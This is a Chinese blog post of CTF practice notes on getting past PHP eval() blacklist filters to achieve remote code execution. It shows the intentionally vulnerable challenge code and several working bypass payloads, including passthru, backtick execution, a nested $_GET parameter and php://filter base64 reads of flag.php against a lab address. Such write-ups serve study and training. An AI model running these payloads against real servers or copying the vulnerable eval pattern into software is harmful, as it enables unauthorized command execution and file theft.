RCE的另外一些绕过练习

最新推荐文章于 2024-09-24 11:41:26 发布
最新推荐文章于 2024-09-24 11:41:26 发布
阅读量401 收藏 1
点赞数 3
文章标签: 绕过 rce rce绕过 php 安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141241118
版权

目录

被过滤了flag怎么办

方法

结果 

 过滤了flag、php、system

方法一

结果 

​编辑

方法二

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

方法一 

方法二

相对于上面一道题来说多过滤了一个括号 

方法一

被过滤了flag怎么办

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

方法

?c=system('cat fla*');

结果 

 过滤了flag、php、system

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

方法一

?c=echo%20`cat%20fla*`;

结果 

方法二

?c=passthru('cat fla*');

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

方法一 

http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php

方法二

http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php

相对于上面一道题来说多过滤了一个括号 

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

方法一

http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php

 

板栗妖怪
关注
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2206
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
RCE绕过靶场练习
记录学习,一起进步
12-15 930
RCE绕过的靶场练习
RCE绕过练习
m0_74848570的博客
08-14 933
你提到的“语言构造器”,英文是"language construct",是语言构成的意思,翻译成语言构造器难免有点令人困惑。PHP里有echoprintdierequire等几个特殊的关键字,虽然它们用起来像是函数,但实际上更类似于ifwhile这样控制语句,而不是一个函数。也就是说,当解释器遇到:这样的一个表达式的时候,并不会把它转换成函数调用,而是直接映射到一系列预先定义好的操作。使用语言构成的时候可以加括号,也可以不加括号,但是使用函数的时候必须加括号。
命令执行各种绕过总结
m0_64815693的博客
10-11 9112
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
命令执行绕过练习(一)
qwzf
08-12 1758
0x00 前言 总结完命令执行漏洞的相关绕过知识,做一下CTF题巩固一下,并总结一下做题过程。 0x01 GKCTF-Check_In 题目源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
SSRF漏洞深入利用与防御方案绕过技巧
道阻且长,行则将至。
07-11 1168
本文借助 CTFHub 与 portswigger 两个 SSRF 靶场,实践练习了 SSRF 漏洞的基础利用(内网访问、文件读取、端口探测)和进阶利用(Gopher 协议发送 post 请求、攻击 Redis 实现 RCE 等),最后实践了常见的防御方案绕过手段(黑白名单绕过、重定向、DNS 绑定等)。
RCE学习(一)
Dug123456_的博客
05-01 938
RCE:远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。可选,用来存放搜索结果,$matches[0]存放所有匹配的字符串,$matches[1]用来存放第一个匹配的字符串,$matches[2]用来存放第三个匹配的字符串,以此类推。管道输出符|:前面命令的输出作为后面命令的输入,把前面命令的结果作为后面命令的参数;dir /ah /os //显示当目下隐藏的文件和目录,按文件大小从小到大排序。
CTFHUB-web-RCE-综合过滤练习
weixin_68416970的博客
08-07 145
用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过。查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、;发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问。
CTFHub技能书解题笔记-RCE-综合过滤练习
qq_43006864的博客
04-06 3085
直接开题,综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢? 估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。 这里我们慢慢绕过吧。一层层过。 首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。 进行利用,发现;可以通过%0a代替 ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资...
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1099
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
利用Opcache缓存RCE以及"/."trick
young9222的博客
04-04 611
2019年3月21日10:20:01 今天对于昨天的《PHP代码审计练习》中第三题"php/."有了新的理解,我使用的方法其实是非预期解,正解是利用opcache覆盖index.php,而不是利用php底层问题来覆盖index.php ...
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
软希网分享源码的博客
09-23 478
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
PHP中error_reporting函数作用
sheji888的专栏
09-24 720
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 676
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
最新发布
09-24 328
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
内核是如何发送数据包
weixin_45673259的博客
09-22 974
网络发包总流程图如下:从上图中可以看到用户数据被拷贝到内核态,然后经过协议栈处理后进入RingBuffer。随后网卡驱动真正的将数据发送了出去。当发送完成的时候,是通过硬中断来通知CPU,然后清理RingBuffer。下面从源码的角度给出一个流程图。
使用php生成图片
f897907070的博客
09-24 480
/ 替换为实际字体文件路径' //注意直接跟图片地址就好。// 替换为你的保存路径。// $text = "dfsd代发收到";// 创建一个120x40的图像。// 设置内容类型为PNG。// 设置字体文件路径。
红旗Linux RCE认证详解与常见问题解析
红旗Linux RCE认证考试题库包含了关于红旗Linux系统的一些基础和高级概念,涵盖了网络安全、系统管理、网络协议和服务配置等多个方面。以下是一些关键知识点的详细解释: 1. **命令行操作与系统配置**: - 在`/etc/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值